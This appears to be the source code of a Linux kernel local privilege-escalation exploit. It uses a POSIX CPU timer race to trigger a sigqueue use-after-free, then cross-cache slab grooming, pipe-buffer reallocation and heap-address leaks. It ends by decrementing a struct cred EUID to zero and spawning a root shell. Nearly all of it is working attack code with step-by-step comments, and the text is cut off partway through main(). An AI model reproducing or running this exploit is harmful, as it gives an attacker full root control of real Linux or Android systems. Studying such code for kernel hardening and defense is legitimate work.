README.md
Rendering markdown...
#define _GNU_SOURCE
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdlib.h>
#include <err.h>
#include <sys/prctl.h>
#include <sched.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>
#include <sys/signalfd.h>
#include <poll.h>
#include <errno.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/mman.h>
#include <linux/futex.h>
#include <sys/epoll.h>
#include <fcntl.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
#define PAGE_SIZE 0x1000uLL
// For winning the races and extending
// the race windows
#define NUM_SAMPLES 100000
#define NUM_TIMERS 18
#define ONE_MS_NS 1000000uLL
#define SYSCALL_LOOP_TIMES_MAX 300
#define EPOLL_COUNT 500
#define SFD_DUP_COUNT 100
// For synchronization between parent and child
#define SUCCESS_CHAR 's'
#define FAIL_CHAR 'f'
#define SUCCESS_STR "s"
#define FAIL_STR "f"
// The following variables are target dependent. Some benchmarking can
// be done from userland beforehand so that these variables aren't
// needed, but just for this exploit, I manually set them to values
// that work for me. You'll have to figure them out yourself.
#define PARENT_SETTIME_DELAY_US 22000
#define PARENT_SETTIME_DELAY_US_DELTA 50
#define CPU_USAGE_THRESHOLD 22000
/* Global variables for exploit setup START */
// Thread synchronization in child process
pthread_barrier_t barrier;
// Timers used to stall `handle_posix_cpu_timers()` to extend the race window
timer_t stall_timers[NUM_TIMERS];
// Thread that will trigger the timer handling, and also the thread that will
// be reaped by the exploit parent process
pthread_t race_thread;
int exploit_child_to_parent[2];
int exploit_parent_to_child[2];
int sigusr1_sfds[SFD_DUP_COUNT]; // signalfd for increasing race window
int sigusr2_sfds[SFD_DUP_COUNT]; // signalfd for detecting the UAF later.
// Amount of LESS times to loop the `getpid()` syscall to waste CPU time
int syscall_loop_times = 0;
int race_retry_count = 0; // For debugging purposes
pid_t exploit_child_pid, exploit_parent_pid;
// BIG NOTE: The very first timer created by a process actually gets timer ID 0,
// so checking for NULL here is not good enough to figure out whether a timer was
// allocated or not.
//
// Instead, set these to -1, and check for -1 later.
timer_t uaf_timer = (void *) -1, realloc_timer = (void *) -1; // The UAF timer handlers
/* Global variables for exploit setup END */
/* Global variables for cross-cache START */
// `sigqueue_cachep` related constants.
#define SIGQUEUE_objs_per_slab 51
#define SIGQUEUE_cpu_partial 30
#define SIGQUEUE_slab_count 33
#define SIGQUEUE_obj_size 80
// `struct sigqueue` related constants.
#define SIGQUEUE_PREALLOC 1
#define SIGQUEUE_list_next_offset 0
#define SIGQUEUE_list_prev_offset 8
#define SIGQUEUE_info_si_signo_offset (24+0)
#define SIGQUEUE_flags_offset 16
#define SIGQUEUE_user_offset 72
// `cred_jar` and `struct cred` related constants.
#define CRED_JAR_slab_size 192
#define CRED_JAR_euid_offset 20
#define CRED_JAR_egid_offset 24
// This list holds the timers used for cross-caching (both times).
timer_t cross_cache_timers[SIGQUEUE_slab_count][SIGQUEUE_objs_per_slab];
/* Global variables for cross-cache END */
/* Global variables for second stage START */
#define NUM_CRED_PROCS 1000 // Number of processes to spray `struct cred` objects with
int parent_owns_uaf_sigqueue = 0; // Does the parent or child have the UAF sigqueue?
pid_t buggy_pid = 0; // Parent / child process PID based on above
/* Global variables for second stage END */
void pin_on_cpu(int i) {
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(i, &mask);
sched_setaffinity(0, sizeof(mask), &mask);
}
static inline long long ts_to_ns(const struct timespec *ts) {
return (long long)ts->tv_sec * 1000000000LL + (long long)ts->tv_nsec;
}
// Helper function to fully drain a signalfd.
//
// WARNING!!!! THIS FUNCTION IS AI GENERATED!!! DO NOT USE XD
int drain_signalfd(int sfd) {
int sig_count = 0;
for (;;) {
struct signalfd_siginfo si;
ssize_t n = read(sfd, &si, sizeof(si));
if (n > 0) { sig_count++; continue; } // drained some; keep going
if (n == -1 && errno == EAGAIN) break; // fully drained
if (n == -1 && errno == EINTR) continue; // interrupted; retry
}
return sig_count;
}
static inline size_t rdtsc_begin(void)
{
#if defined(ARM64)
return rdtsc();
#else
size_t a, d;
asm volatile ("mfence");
asm volatile ("rdtsc" : "=a" (a), "=d" (d));
a = (d<<32) | a;
asm volatile ("lfence");
return a;
#endif
}
static inline size_t rdtsc_end(void)
{
#if defined(ARM64)
return rdtsc();
#else
size_t a, d;
asm volatile ("lfence");
asm volatile ("rdtsc" : "=a" (a), "=d" (d));
a = (d<<32) | a;
asm volatile ("mfence");
return a;
#endif
}
// This function measures the average CPU time consumption of the `getpid()` syscall.
//
// Can overflow if `NUM_SAMPLES` is too high, but with simple syscalls,
// this works just fine.
//
// Can also actually return 0 if some weird scheduler behavior occurs and causes
// the `total_nsec` to overflow, so ensure to check for that when calling it.
//
// Also, very important to be pinned to one CPU before running this!
long int getpid_cpu_usage() {
size_t (*times)[2] = malloc(NUM_SAMPLES * sizeof(size_t[2]));
for (int i = 0; i < NUM_SAMPLES; i++) {
times[i][0] = rdtsc_begin();
syscall(__NR_getpid);
times[i][1] = rdtsc_end();
}
size_t total_nsec = 0;
for (int i = 0; i < NUM_SAMPLES; i++) {
total_nsec += times[i][1] - times[i][0];
}
free(times);
long int getpid_avg = total_nsec / NUM_SAMPLES;
return total_nsec / NUM_SAMPLES;
}
// Helper function to read from the reallocated pipe buffer data page.
//
// Reads `size` bytes at offset `offset` out of the pipe and return it in `buf`.
//
// NOTES:
// - `buf` is assumed to be at least PAGE_SIZE bytes large.
// - The pipe is assumed to be readable (i.e write_pipe() was
// already called before this).
void read_pipe(int pfds[2], size_t size, size_t offset, char *buf) {
size_t ret = 0;
if (size > PAGE_SIZE) {
printf("read_pipe: size too big\n");
SYSCHK(-1);
}
// Read up to offset first, then read size bytes
ret = SYSCHK(read(pfds[0], buf, offset));
if (ret != offset) {
printf("read_pipe: offset read failed, offset %ld read %ld\n", offset, ret);
SYSCHK(-1);
}
SYSCHK(read(pfds[0], buf, size));
}
// Helper function to read from the reallocated pipe buffer data page.
//
// Writes `size` bytes out of `buf` into the pipe at offset `offset`.
//
// NOTES:
// - `buf` is assumed to be at least PAGE_SIZE bytes large.
// - This will clobber all data before offset.
// TODO:
void write_pipe(int pfds[2], size_t size, size_t offset, void *buf) {
size_t ret = 0;
if (size > PAGE_SIZE) {
printf("write_pipe: size too big\n");
SYSCHK(-1);
}
// Write up to offset first, then write the data
char zero_buf[offset];
memset(zero_buf, 0, offset);
ret = SYSCHK(write(pfds[1], zero_buf, offset));
if (ret != offset) {
printf("write_pipe: offset write failed, offset %ld wrote %ld\n", offset, ret);
SYSCHK(-1);
}
ret = SYSCHK(write(pfds[1], buf, size));
if (ret != size) {
printf("write_pipe: size write failed, size %ld wrote %ld\n", size, ret);
SYSCHK(-1);
}
}
// This function pre-allocates sigqueues very carefully for cross-caching (both times).
//
// NOTE: Ensure you are on the correct CPU before calling this function!
void sigqueue_crosscache_preallocs() {
// ---------------------------------------------------------------------------------
//
// NOTE: On a real android device, a bunch of sigqueues should be allocated first
// so that all slab pages from per cpu partial lists, per node partial lists, etc
// are used up. This can be done by just spamming real-time signals to some process
// that's blocking them.
//
// I won't be doing that here, just going to assume this is being ran in QEMU on a
// clean setup where the sigqueue cache's slab pages will not be on any per-cpu
// or per-node partial lists.
//
// ---------------------------------------------------------------------------------
//
// Goal: get our UAF timer in the middle of slab 3.
struct sigevent cross_cache_evt = {0};
cross_cache_evt.sigev_notify = SIGEV_NONE;
// Allocate full slabs 1 and 2.
for (int i = 0; i < 2; i++) {
for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[i][j]));
}
}
// Allocate 25 objects in slab 3
for (int i = 0; i < 25; i++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][i]));
}
// Next allocation will be the sigqueue whose slab will be cross-cached.
}
// This function post-allocates sigqueues very carefully for cross-caching (both times).
//
// NOTE: Ensure you are on the correct CPU before calling this function!
void sigqueue_crosscache_postallocs() {
struct sigevent cross_cache_evt = {0};
cross_cache_evt.sigev_notify = SIGEV_NONE;
// We have a freed sigqueue at the head of the freelist of slab 3 right now. Re-allocate
// it plus the remaining 25 objects in that slab now.
//
// You can use this special value with a kernel patch to figure out where it's allocated.
// This should reallocate on top of whatever sigqueue we are attempting to cross-cache. If
// it doesn't, there's a bug in this exploit!
// cross_cache_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL;
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][25]));
cross_cache_evt.sigev_value.sival_ptr = (void *)0; // reset if it was set
// Allocate the remaining 25 objects in slab 3.
for (int i = 26; i < SIGQUEUE_objs_per_slab; i++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[2][i]));
}
// Allocate sigqueues for the remaining slabs.
for (int i = 3; i < SIGQUEUE_slab_count; i++) {
for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &cross_cache_evt, &cross_cache_timers[i][j]));
}
}
}
// This function frees the slab 3 page back to the page allocator by very
// carefully freeing sigqueues in the `cross_cache_timers` list.
void free_crosscache_sigqueues() {
// Now, the target sigqueue should be in the middle of slab 3.
//
// Strategically free sigqueues to fill up the per-cpu partial list, but also
// ensure that the target sigqueue's slab is fully freed before freeing the 32nd slab.
//
// Start by freeing the first and last object in slab 1.
SYSCHK(timer_delete(cross_cache_timers[0][0]));
SYSCHK(timer_delete(cross_cache_timers[0][SIGQUEUE_objs_per_slab-1]));
// Now, free the first, and then objects 26 through 51 in slab 2.
SYSCHK(timer_delete(cross_cache_timers[1][0]));
for (int i = 25; i < SIGQUEUE_objs_per_slab; i++) {
SYSCHK(timer_delete(cross_cache_timers[1][i]));
}
// Free all objects in slab 3
for (int i = 0; i < SIGQUEUE_objs_per_slab; i++) {
SYSCHK(timer_delete(cross_cache_timers[2][i]));
}
// Free objects 1 through 25 in slab 4
for (int i = 0; i < 25; i++) {
SYSCHK(timer_delete(cross_cache_timers[3][i]));
}
// For the remaining slabs up to `cpu_partial` (inclusive), free the first and last obj
for (int i = 4; i < SIGQUEUE_cpu_partial+1; i++) {
SYSCHK(timer_delete(cross_cache_timers[i][0]));
SYSCHK(timer_delete(cross_cache_timers[i][SIGQUEUE_objs_per_slab-1]));
}
// Now, freeing one object from the `cpu_partial+1`th slab should trigger
// `unfreeze_partials()`, which will move fully freed slabs (i.e slab 3) to
// the page allocator.
//
// Free first and last sigqueue here just in case the first one is in the
// slab overlapped with the previous index.
SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][0]));
SYSCHK(timer_delete(cross_cache_timers[SIGQUEUE_cpu_partial+1][SIGQUEUE_objs_per_slab-1]));
}
void cleanup_crosscache_sigqueues() {
// In this case, we can just timer_delete() every single timer without
// checking for errors. If they exist, they will be deleted. Otherwise,
// we'll see an error.
for (int i = 0; i < SIGQUEUE_slab_count; i++) {
for (int j = 0; j < SIGQUEUE_objs_per_slab; j++) {
timer_delete(cross_cache_timers[i][j]);
}
}
}
// This is the function responsible for triggering `handle_posix_cpu_timers()`.
void race_func(void) {
// Pin to same CPU as the `free_func()` thread. This is the first cross-cache
// CPU.
pin_on_cpu(3);
// For the race condition trigger
struct sigevent race_evt = {0};
race_evt.sigev_notify = SIGEV_SIGNAL;
race_evt.sigev_signo = SIGUSR1;
// For the UAF timer
struct sigevent uaf_evt = {0};
uaf_evt.sigev_notify = SIGEV_SIGNAL;
uaf_evt.sigev_signo = SIGUSR1; // SIGUSR1 for now
// uaf_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // Detect this UAF timer
prctl(PR_SET_NAME, "RACER");
// prctl(PR_SET_NAME, "REAPEE"); // KERNEL PATCH: 500ms delay with this
// Send this thread's TID to the parent process, so the parent can attach to us.
pid_t tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(exploit_child_to_parent[1], &tid, sizeof(pid_t))); // sync 1
// Get the average CPU time usage of the `getpid()` syscall, so we
// can use it for the trigger later
long int getpid_avg = 0;
// `getpid_cpu_usage()` can technically return 0, it's very rare but
// if it does, just recalculate.
while (getpid_avg == 0) {
getpid_avg = getpid_cpu_usage();
}
// Wait for parent to attach and continue us.
pthread_barrier_wait(&barrier); // barrier 1
// Create the UAF timer on the first cross-cache CPU.
//
// NOTE: This must be the last timer created on this CPU's active slab! Because we will
// free it and re-allocate over it in `free_func()`.
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &uaf_evt, &uaf_timer));
// Switch the pinned CPU after creating the UAF timer. This is important because
// `free_func()` must be able to run concurrently to this, and we also don't want to
// touch the active CPU slab of the cross-cache CPU!
pin_on_cpu(2);
// Create the remaining stall timers for extending the race window
for (int i = 0; i < NUM_TIMERS; i++) {
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &race_evt, &stall_timers[i]));
}
// Wait for the main thread to arm the timers. This is to make sure
// this thread does not use CPU time to arm the timers.
pthread_barrier_wait(&barrier); // barrier 2 - wake up main thread
pthread_barrier_wait(&barrier); // barrier 3 - wait for armed timers
// Waste just the right amount of CPU time now without firing any of the timers.
//
// The logic here is that calling `getpid()` enough times to consume 1 ms of CPU time,
// and then adding a threshold amount of times on top of that will ensure that the timers
// fire BEFORE `do_exit()` is called.
//
// Then, subtract `syscall_loop_times` (which changes on each retry) to slowly reduce the
// amount of CPU time being consumed, until the timers fire right after `exit_notify()` wakes
// up the parent exploit process.
//
// Use a print statement in `free_func()` when it receives SIGUSR1 to figure out how often
// the timers are firing, and adjust CPU_USAGE_THRESHOLD accordingly so that it fires sometimes,
// but not every time.
for (int i = 0; i < ((ONE_MS_NS / getpid_avg) + CPU_USAGE_THRESHOLD - syscall_loop_times); i++) {
syscall(__NR_getpid);
}
// This `return` will trigger `do_exit()` in the kernel. The goal is for a scheduler interrupt
// to occur and `handle_posix_cpu_timers()` to run after `exit_notify()` wakes up the parent
// exploit process that called `waitpid()` on us.
return;
}
void free_func(void) {
pin_on_cpu(3);
prctl(PR_SET_NAME, "FREE_FUNC");
// Set up a poll for SIGUSR1. As soon as we receive it, we know
// we're in the race window.
struct pollfd pfd = {
.fd = sigusr1_sfds[0],
.events = POLLIN
};
// Poll for SIGUSR1.
for (;;) {
int ret = poll(&pfd, 1, 0);
// Got SIGUSR1 from the first stall timer, in race window now.
if (pfd.revents & POLLIN) {
// Free the UAF timer now on CPU 3 (first cross-cache CPU).
SYSCHK(timer_delete(uaf_timer));
// Immediately switch pinned CPU to 0 and wake up the parent exploit process.
//
// Parent exploit process will already have switched to CPU 3, so it can wake
// up immediately and re-allocate the UAF timer.
//
// Important to reallocate in the parent process, so that the sighand locks are
// different.
pin_on_cpu(0);
SYSCHK(write(exploit_child_to_parent[1], SUCCESS_STR, 1)); // sync 4.SUCCESS
// Use the barrier to let the child process continue now and handle
// the SIGUSR1 signals.
pthread_barrier_wait(&barrier); // barrier 4
break;
}
// Spurious wake-up check
if (ret < 0 && errno == EINTR)
continue;
// Some unknown error occurred, pause to debug
if (ret < 0) {
perror("free_func poll");
getchar();
break;
}
}
}
// Stage 2 starts after:
//
// 1. The UAF sigqueue is freed.
// 2. We still have a handle to in either the parent or child's pending list.
// 3. The UAF sigqueue's pointers should point back to itself, making it
// non-dequeueable by default.
void second_stage_exploit() {
struct signalfd_siginfo si;
char m;
// Create a signalfds for all three signals we need to dequeue later.
sigset_t mask;
sigemptyset(&mask);
sigaddset(&mask, SIGUSR2); // signal used by UAF sigqueue
int sigusr2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
sigemptyset(&mask);
sigaddset(&mask, SIGRTMIN+1); // signal used by other sigqueue
int sigrt1_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
sigemptyset(&mask);
sigaddset(&mask, SIGRTMIN+2); // signal used for leaking task pending list addr
int sigrt2_sfd = SYSCHK(signalfd(-1, &mask, SFD_CLOEXEC | SFD_NONBLOCK));
// Prepare the buffer used by the reallocated pipe buffer data page.
char buf[PAGE_SIZE];
memset(buf, 0, PAGE_SIZE);
// Just double confirm we are pinned to the right cross-cache CPU.
pin_on_cpu(3);
printf("\n[+] Stage 2 - Cross-cache the UAF sigqueue's slab\n");
// Allocate the rest of the sigqueues for cross-cache
sigqueue_crosscache_postallocs();
// Allocate a pipe for the pipe buffer data page later, and make it
// non-blocking for error checking too.
int realloc_pipefds[2];
SYSCHK(pipe(realloc_pipefds));
// Read end non-blocking
int flags = fcntl(realloc_pipefds[0], F_GETFL, 0);
SYSCHK(fcntl(realloc_pipefds[0], F_SETFL, flags | O_NONBLOCK));
// Write end non-blocking
flags = fcntl(realloc_pipefds[1], F_GETFL, 0);
SYSCHK(fcntl(realloc_pipefds[1], F_SETFL, flags | O_NONBLOCK));
// Now free the UAF sigqueue's page back to the page allocator.
free_crosscache_sigqueues();
// Realloc UAF sigqueue as a pipe buffer page immediately after it's freed.
// This is done by writing to the pipe.
SYSCHK(write(realloc_pipefds[1], buf, PAGE_SIZE));
printf("\t[+] Reallocated UAF sigqueue slab as a pipe buffer data page\n");
printf("\t[+] Cleaning up all cross-cache allocations to prepare for next cross-cache\n");
// We will be cross-caching again very soon, so free all other cross-cache sigqueues.
// NOTE: do this on the same CPU as the first cross-cache.
cleanup_crosscache_sigqueues();
printf("\t[+] Preparing task pending list for heap leaks\n");
// Switch CPUs to start on a clean slate for the second cross-cache.
pin_on_cpu(2);
// Do the preallocs same as before.
sigqueue_crosscache_preallocs();
// Send a new signal to the process to fill in the UAF sigqueue's next pointer
// Use `tkill()` as that uses the task's pending list. `kill()` uses the
// shared pending list instead.
//
// This sigqueue is allocated after the preallocs.
SYSCHK(syscall(__NR_tkill, buggy_pid, SIGRTMIN+1));
// Before dequeueing the SIGRTMIN+2 signal, switch back to a non-cross-cache CPU.
//
// This is because this signal was prepared on a non-cross-cache CPU in the first
// place, and we aren't using it in the cross-cache, so in order to not mess with
// the cross-cache, we have to free it on a different CPU.
pin_on_cpu(1);
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
// Dequeueing this signal will put the pointer of our task struct's pending list
// into the ->prev pointer of the UAF sigqueue.
SYSCHK(read(sigrt2_sfd, &si, sizeof(si)));
} else {
// Child will dequeue the signal for us. Wait for it to finish.
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 2
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 3
}
// Now switch back to the second cross-cache CPU
pin_on_cpu(2);
// Scan the pipe buffer data page for the `next` and `prev` pointer to store them.
// Everything will be zeroes except those pointers at this point in time.
read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf);
size_t other_sigqueue_addr = 0;
size_t task_pending_list_addr = 0;
size_t uaf_sigqueue_offset = 0;
// Increment by `SIGQUEUE_obj_size` and look at the `next` pointer offset.
for (int i = 0; i < PAGE_SIZE; i += SIGQUEUE_obj_size) {
other_sigqueue_addr = *((size_t *)(buf + (i + SIGQUEUE_list_next_offset)));
if (other_sigqueue_addr) {
uaf_sigqueue_offset = i;
task_pending_list_addr = *((size_t *)(buf + (i + SIGQUEUE_list_prev_offset)));
printf("\t[+] Heap leaks:\n");
printf("\t\t- UAF sigqueue page offset 0x%lx\n", uaf_sigqueue_offset);
printf("\t\t- Other sigqueue 0x%lx\n", other_sigqueue_addr);
printf("\t\t- Task pending list addr 0x%lx\n", task_pending_list_addr);
break;
}
}
// Set up the UAF sigqueue so we can leak it's own address now.
// Key points are:
//
// 1. Setting `next` and `prev` both to the other sigqueue's address ensures
// that the UAF sigqueue's pointer stays in the task pending list.
// 2. `info.si_signo` must be set to SIGUSR2, otherwise the signal will not
// be dequeued.
// 3. `SIGQUEUE_PREALLOC` does not technically need to be set, but I just do it anyway.
memset(buf, 0, PAGE_SIZE);
*((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next
*((size_t *)(buf + SIGQUEUE_list_prev_offset)) = other_sigqueue_addr;// list->prev
*((int *)(buf + SIGQUEUE_flags_offset)) = SIGQUEUE_PREALLOC; // flags
*((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGUSR2; // info->si_code
write_pipe(realloc_pipefds, SIGQUEUE_info_si_signo_offset + sizeof(int), uaf_sigqueue_offset, buf);
// Now drain the UAF sigqueue's signal to write it's own pointers back into itself.
// This will happen because of the `list_del_init()` in `collect_signal()`.
//
// NOTE: This overwrites the other sigqueue's `next` and `prev` pointers to point
// back to the other sigqueue's address. However, the task pending list's
// `prev` pointer still points to other sigqueue's address. Basically,
// when we free the other sigqueue soon, the task pending list's `prev`
// pointer won't be updated.
//
// All this means is that we can't append anymore signals to this task's pending
// list after this point.
//
// NOTE: After this, SIGUSR2 is removed from the task's signal mask, but
// SIGRTMIN+1 stays.
//
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
SYSCHK(read(sigusr2_sfd, &si, sizeof(si)));
} else {
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 4
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 5
}
// Read the UAF sigqueue's own address now through the pipe buffer
size_t uaf_sigqueue_addr = 0;
read_pipe(realloc_pipefds, 8, uaf_sigqueue_offset, buf);
uaf_sigqueue_addr = *((size_t *)(buf + SIGQUEUE_list_next_offset));
printf("\t\t- UAF sigqueue address 0x%lx\n", uaf_sigqueue_addr);
// Now free the other sigqueue back to the freelist of it's slab page.
//
// Since our UAF sigqueue is at the head of the pending list, set it's next pointer
// to point to the other sigqueue so the list can be traversed to it.
read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe
*((size_t *)(buf + SIGQUEUE_list_next_offset)) = other_sigqueue_addr; // list->next
write_pipe(realloc_pipefds, SIGQUEUE_list_next_offset + sizeof(size_t), uaf_sigqueue_offset, buf);
// Finally, dequeue the other signal's sigqueue and free it. It's SIGRTMIN+1.
//
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
} else {
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 6
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 7
}
printf("\n[+] Stage 3 - Cross-cache the other sigqueue's slab\n");
// Now, second cross-cache post allocs. The target sigqueue is the
// other sigqueue, which was just freed.
sigqueue_crosscache_postallocs();
// Before freeing the other sigqueue's slab page back to the page allocator,
// fork NUM_CRED_PROCS processes. Do this on a non-cross-cache CPU.
//
// This is preparing for the `struct cred` spray later.
pin_on_cpu(1);
printf("\t[+] Preparing %d processes for future `struct cred` spray\n", NUM_CRED_PROCS);
int cred_parent_pfds[2];
int cred_child_pfds[2];
SYSCHK(pipe(cred_parent_pfds));
SYSCHK(pipe(cred_child_pfds));
for (int i = 0; i < NUM_CRED_PROCS; i++) {
pid_t pid = SYSCHK(fork());
if (!pid) {
// child process
SYSCHK(close(cred_parent_pfds[1]));
SYSCHK(close(cred_child_pfds[0]));
// Wait for the parent to wake us up to call `setresuid(-1,-1,-1)
SYSCHK(read(cred_parent_pfds[0], &m, 1));
// Pin on same CPU as the cross-cache CPU before calling
// `setresuid(-1,-1,-1)`. This allocates one cred struct.
pin_on_cpu(2);
SYSCHK(setresuid(-1,-1,-1));
// Reset CPU and let the parent know we finished.
pin_on_cpu(1);
SYSCHK(write(cred_child_pfds[1], &m, 1));
// Wait for the parent to potentially decrement our EUID to 0.
SYSCHK(read(cred_parent_pfds[0], &m, 1));
// Check our EUID
uid_t euid = geteuid();
// If we have root privs now, just spawn a shell
if (euid == 0) {
printf("\t[+] Found child process with euid=%d!\n", euid);
printf("\t[+] Spawning root shell...\n");
printf("\n");
printf("\n");
printf("\n");
// Must set our UID and GID to 0 as well. "/bin/sh" seems to do a
// `setuid(getuid())`, and since the we only changed our EUID,
// that resets our privs here.
setresuid(0, 0, 0);
setresgid(0, 0, 0);
system("/bin/sh");
} else {
// Parent won't wake us up anymore, wake up the parent and
// block forever
SYSCHK(write(cred_child_pfds[1], &m, 1));
SYSCHK(read(cred_parent_pfds[0], &m, 1));
}
}
}
// Continuing in the parent process now.
SYSCHK(close(cred_parent_pfds[0]));
SYSCHK(close(cred_child_pfds[1]));
// For later, pick the second cred object in the other sigqueue's slab arbitrarily.
size_t target_cred_addr = (other_sigqueue_addr & ~0xfff) + CRED_JAR_slab_size;
printf("\t[+] Target cred object to modify will be at 0x%lx\n", target_cred_addr);
// Now free the other sigqueue's slab page, make sure to switch CPUs back to the
// second cross-cache CPU!
pin_on_cpu(2);
free_crosscache_sigqueues();
// Wake up each child process to call `setresuid(-1,-1,-1)`
//
// NOTE: Writing to the pipe will allocate new pages. Switch
// to a non-cross-cache CPU to do this.
pin_on_cpu(1);
for (int i = 0; i < NUM_CRED_PROCS; i++) {
SYSCHK(write(cred_parent_pfds[1], &m, 1));
SYSCHK(read(cred_child_pfds[0], &m, 1));
}
printf("\t[+] Reallocated other sigqueue's slab as a `struct cred` page\n");
printf("\n[+] Stage 4 - Decrement EUID of target cred to 0\n");
// At this point, SIGUSR2 will have been removed from the task's pending signal mask,
// but SIGRTMIN+1 will still be on it. Set up the UAF sigqueue to use SIGRTMIN+1.
//
// Setting up the `user` pointer to `target_address - 8` gives us an arbitrary
// decrement primitive. Point this to the target cred's EUID offset - 8.
read_pipe(realloc_pipefds, PAGE_SIZE, 0, buf); // reset pipe
memset(buf, 0, PAGE_SIZE);
*((size_t *)(buf + SIGQUEUE_list_next_offset)) = uaf_sigqueue_addr; // list->next
*((size_t *)(buf + SIGQUEUE_list_prev_offset)) = uaf_sigqueue_addr;// list->prev
*((int *)(buf + SIGQUEUE_info_si_signo_offset)) = SIGRTMIN+1; // info->si_code
*((size_t *)(buf + SIGQUEUE_user_offset)) = target_cred_addr + CRED_JAR_euid_offset - 8uLL; // user
write_pipe(realloc_pipefds, SIGQUEUE_user_offset + sizeof(size_t), uaf_sigqueue_offset, buf);
// Arbitrary decrement time! Decrement target cred's EUID to 0. This process
// will have the same UID as the target cred, so we can use that to know
// how many times to decrement.
//
// NOTE: If the `buggy_pid` points to the child process, we have to ask the
// child process to dequeue the signal for us.
if (parent_owns_uaf_sigqueue) {
for (int i = 0; i < getuid(); i++) {
SYSCHK(read(sigrt1_sfd, &si, sizeof(si)));
}
} else {
SYSCHK(write(exploit_parent_to_child[1], SUCCESS_STR, 1)); // stage 2 - sync 8
SYSCHK(read(exploit_child_to_parent[0], &m, 1)); // stage 2 - sync 9
}
printf("\t[+] Exploit finished. Searching for child with EUID 0...\n");
// Now wake up each child process to check which one is root.
// If we find the root process, we'll block forever and the child
// can launch a shell.
for (int i = 0; i < NUM_CRED_PROCS; i++) {
SYSCHK(write(cred_parent_pfds[1], &m, 1));
SYSCHK(read(cred_child_pfds[0], &m, 1));
}
// If we ever get here, the exploit failed for some reason.
printf("[!!!] Exploit failed! I have no idea why XD try again?\n");
}
int main(int argc, char *argv[]) {
// exploit process
char m;
// Parent and child setup
// Use pipes to communicate between parent and child
SYSCHK(pipe(exploit_child_to_parent));
SYSCHK(pipe(exploit_parent_to_child));
pid_t pid = SYSCHK(fork());
if (pid) {
// exploit parent process
pin_on_cpu(0);
close(exploit_child_to_parent[1]);
close(exploit_parent_to_child[0]);
prctl(PR_SET_NAME, "EXPLOIT_PARENT");
pid_t racer_tid;
// Reallocated timer event - use SIGUSR2 as it will be easy to
// tell we won the race if we ever receive SIGUSR2 on the child thread.
//
// Send the signal to ourself specifically, so it uses our pending
// list instead of the shared pending list.
struct sigevent realloc_evt = {0};
realloc_evt.sigev_notify = SIGEV_SIGNAL | SIGEV_THREAD_ID;
realloc_evt.sigev_signo = SIGUSR2;
realloc_evt._sigev_un._tid = (pid_t)syscall(SYS_gettid);
// realloc_evt.sigev_value.sival_ptr = (void *)0x4141414141414141uLL; // For debugging
// Create SIGUSR2 sfd, and block SIGUSR2 and SIGRTMIN+1 and SIGRTMIN+2 on this process.
sigset_t block_mask;
sigemptyset(&block_mask);
sigaddset(&block_mask, SIGUSR2);
int sigusr2_sfd = SYSCHK(signalfd(-1, &block_mask, SFD_CLOEXEC | SFD_NONBLOCK));\
sigaddset(&block_mask, SIGRTMIN+1);
sigaddset(&block_mask, SIGRTMIN+2);
SYSCHK(sigprocmask(SIG_BLOCK, &block_mask, NULL));
// itimerspec that fires the time immediately when used with `TIMER_ABSTIME`.
struct itimerspec fire_ts = {0};
fire_ts.it_value.tv_nsec = 1;
int parent_settime_delay = PARENT_SETTIME_DELAY_US;
// int parent_settime_delay = 200 * 1000; // KERNEL PATCH: 200ms delay
// Prepare the preallocs for cross-cache for parent process
// NOTE: Must be on CPU 3!
pin_on_cpu(3);
sigqueue_crosscache_preallocs();
pin_on_cpu(0);
// On a different CPU to the cross-cache CPUs, enqueue a `SIGRTMIN+2` signal.
// This is used later to leak the task pending list address.
pid_t my_pid = (pid_t)syscall(SYS_gettid);
SYSCHK(syscall(__NR_tkill, my_pid, SIGRTMIN+2));
while (1) {
// Initially pin to CPU 0
